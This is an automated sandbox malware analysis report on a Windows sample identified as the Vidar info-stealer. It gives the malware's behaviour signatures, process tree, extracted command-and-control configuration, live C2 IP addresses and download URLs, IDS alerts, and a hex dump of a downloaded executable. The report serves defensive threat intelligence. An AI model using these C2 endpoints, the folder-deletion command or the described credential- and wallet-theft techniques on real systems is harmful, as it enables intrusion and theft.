Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7AeSqNv1rC.exe

Overview

General Information

Sample name:7AeSqNv1rC.exe
renamed because original name is a hash value
Original sample name:f275736a38a6b90825076e8d786ad5c5.exe
Analysis ID:1528620
MD5:f275736a38a6b90825076e8d786ad5c5
SHA1:c0d862ceab728736580f043316cdc099b2ab8924
SHA256:b48eeab60494eb44d8d5ef10a87fd46ad1aa33fdcf7245efb636f69f2fd55f42
Tags:32exetrojanVidar
Infos:

Detection

MicroClip, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MicroClip
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 7AeSqNv1rC.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\7AeSqNv1rC.exe" MD5: F275736A38A6B90825076E8D786AD5C5)
    • InstallUtil.exe (PID: 7628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 7648 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • cmd.exe (PID: 8140 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8156 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2472 cmdline: "C:\Windows\System32\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7220 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7064 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "2ee1445fc63bc20d0e7966867b13e0e1"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 8 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.2.InstallUtil.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  4.2.InstallUtil.exe.400000.0.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    4.2.InstallUtil.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      4.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

                        Sigma Signatures

                        No Sigma rule has matched

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T04:59:37.752997+020020287653Unknown Traffic192.168.2.44974249.12.106.214443TCP
                        2024-10-08T04:59:38.916623+020020287653Unknown Traffic192.168.2.44974349.12.106.214443TCP
                        2024-10-08T04:59:40.295762+020020287653Unknown Traffic192.168.2.44974449.12.106.214443TCP
                        2024-10-08T04:59:41.646972+020020287653Unknown Traffic192.168.2.44974549.12.106.214443TCP
                        2024-10-08T04:59:42.993948+020020287653Unknown Traffic192.168.2.44974649.12.106.214443TCP
                        2024-10-08T04:59:44.408957+020020287653Unknown Traffic192.168.2.44974749.12.106.214443TCP
                        2024-10-08T04:59:45.421774+020020287653Unknown Traffic192.168.2.44974849.12.106.214443TCP
                        2024-10-08T04:59:48.358591+020020287653Unknown Traffic192.168.2.44974949.12.106.214443TCP
                        2024-10-08T04:59:49.452342+020020287653Unknown Traffic192.168.2.44975049.12.106.214443TCP
                        2024-10-08T04:59:50.461923+020020287653Unknown Traffic192.168.2.44975149.12.106.214443TCP
                        2024-10-08T04:59:51.554296+020020287653Unknown Traffic192.168.2.44975249.12.106.214443TCP
                        2024-10-08T04:59:52.582976+020020287653Unknown Traffic192.168.2.44975349.12.106.214443TCP
                        2024-10-08T04:59:54.335990+020020287653Unknown Traffic192.168.2.44975449.12.106.214443TCP
                        2024-10-08T04:59:55.978719+020020287653Unknown Traffic192.168.2.44975649.12.106.214443TCP
                        2024-10-08T04:59:57.531571+020020287653Unknown Traffic192.168.2.44975749.12.106.214443TCP
                        2024-10-08T04:59:59.016134+020020287653Unknown Traffic192.168.2.44976449.12.106.214443TCP
                        2024-10-08T05:00:00.287265+020020287653Unknown Traffic192.168.2.44977549.12.106.214443TCP
                        2024-10-08T05:00:03.370299+020020287653Unknown Traffic192.168.2.44979349.12.106.214443TCP
                        2024-10-08T05:00:04.549674+020020287653Unknown Traffic192.168.2.44980249.12.106.214443TCP
                        2024-10-08T05:00:05.905361+020020287653Unknown Traffic192.168.2.44981249.12.106.214443TCP
                        2024-10-08T05:00:07.445567+020020287653Unknown Traffic192.168.2.44982249.12.106.214443TCP
                        2024-10-08T05:00:09.361394+020020287653Unknown Traffic192.168.2.44983549.12.106.214443TCP
                        2024-10-08T05:00:11.344325+020020287653Unknown Traffic192.168.2.44984749.12.106.214443TCP
                        2024-10-08T05:00:14.613134+020020287653Unknown Traffic192.168.2.44986849.12.106.214443TCP
                        2024-10-08T05:00:16.152280+020020287653Unknown Traffic192.168.2.44988249.12.106.214443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T05:00:17.634663+020020544951A Network Trojan was detected192.168.2.44989145.132.206.25180TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T04:59:42.331574+020020442471Malware Command and Control Activity Detected49.12.106.214443192.168.2.449745TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T04:59:43.686243+020020518311Malware Command and Control Activity Detected49.12.106.214443192.168.2.449746TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T04:59:43.686214+020020490871A Network Trojan was detected192.168.2.44974649.12.106.214443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T05:00:14.868528+020028032702Potentially Bad Traffic192.168.2.449874185.215.113.11780TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: https://t.me/ae5edURL Reputation: Label: malware
                        Found malware configuration
                        Source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "2ee1445fc63bc20d0e7966867b13e0e1"}
                        Multi AV Scanner detection for domain / URL
                        Source: cowod.hopto.orgVirustotal: Detection: 10%Perma Link
                        Source: https://49.12.106.214Virustotal: Detection: 7%Perma Link
                        Source: http://cowod.hopto.orgVirustotal: Detection: 10%Perma Link
                        Source: https://49.12.106.214/mozglue.dllVirustotal: Detection: 6%Perma Link
                        Source: https://49.12.106.214/Virustotal: Detection: 7%Perma Link
                        Source: https://49.12.106.214/nss3.dllVirustotal: Detection: 6%Perma Link
                        Source: https://49.12.106.214/softokn3.dllVirustotal: Detection: 6%Perma Link
                        Source: http://185.215.113.117/inc/clip.exeVirustotal: Detection: 19%Perma Link
                        Source: https://49.12.106.214/freebl3.dllVirustotal: Detection: 6%Perma Link
                        Source: http://185.215.113.117/Virustotal: Detection: 15%Perma Link
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exeReversingLabs: Detection: 87%
                        Multi AV Scanner detection for submitted file
                        Source: 7AeSqNv1rC.exeReversingLabs: Detection: 65%
                        Source: 7AeSqNv1rC.exeVirustotal: Detection: 30%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exeJoe Sandbox ML: detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,4_2_004080A1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00408048
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,4_2_00411E5D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,4_2_0040A7D8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C646C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,4_2_6C646C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C79A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,4_2_6C79A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C794440 PK11_PrivDecrypt,4_2_6C794440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C764420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,4_2_6C764420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7944C0 PK11_PubEncrypt,4_2_6C7944C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C7E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,4_2_6C7E25B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C778670 PK11_ExportEncryptedPrivKeyInfo,4_2_6C778670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C79A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,4_2_6C79A650
                        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49741 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 49.12.106.214:443 -> 192.168.2.4:49742 version: TLS 1.2
                        Source: 7AeSqNv1rC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: freebl3.pdbp source: InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: nss3.pdb@ source: InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: softokn3.pdb@ source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: InstallUtil.exe, 00000004.00000002.2479689311.000000003A9CF000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: InstallUtil.exe, 00000004.00000002.2474489221.000000002EAE4000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                        Source: Binary string: nss3.pdb source: InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
                        Source: Binary string: softokn3.pdb source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_0041543D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,4_2_00414CC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D5C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040B5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401D80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040BF4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415FD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B93F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415B0B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040CD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00415142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]4_2_004014AD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax4_2_004014AD

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49891 -> 45.132.206.251:80
                        Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49746 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.106.214:443 -> 192.168.2.4:49746
                        Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.106.214:443 -> 192.168.2.4:49745
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 08 Oct 2024 03:00:12 GMTContent-Type: application/octet-streamContent-Length: 519680Last-Modified: Fri, 13 Sep 2024 18:20:04 GMTConnection: keep-aliveETag: "66e48254-7ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cf 18 ec ab 8b 79 82 f8 8b 79 82 f8 8b 79 82 f8 3f e5 73 f8 85 79 82 f8 3f e5 71 f8 05 79 82 f8 3f e5 70 f8 95 79 82 f8 26 27 81 f9 98 79 82 f8 26 27 87 f9 be 79 82 f8 26 27 86 f9 aa 79 82 f8 82 01 11 f8 8c 79 82 f8 8b 79 83 f8 ec 79 82 f8 3c 27 8b f9 88 79 82 f8 3c 27 80 f9 8a 79 82 f8 52 69 63 68 8b 79 82 f8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 28 82 e4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a6 05 00 00 58 02 00 00 00 00 00 10 48 02 00 00 10 00 00 00 c0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 a4 07 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 e4 42 00 00 00 7b 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 7b 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 05 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f a5 05 00 00 10 00 00 00 a6 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 ed 01 00 00 c0 05 00 00 ee 01 00 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 cc 21 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 bc 02 00 00 00 e0 07 00 00 04 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e4 42 00 00 00 f0 07 00 00 44 00 00 00 aa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 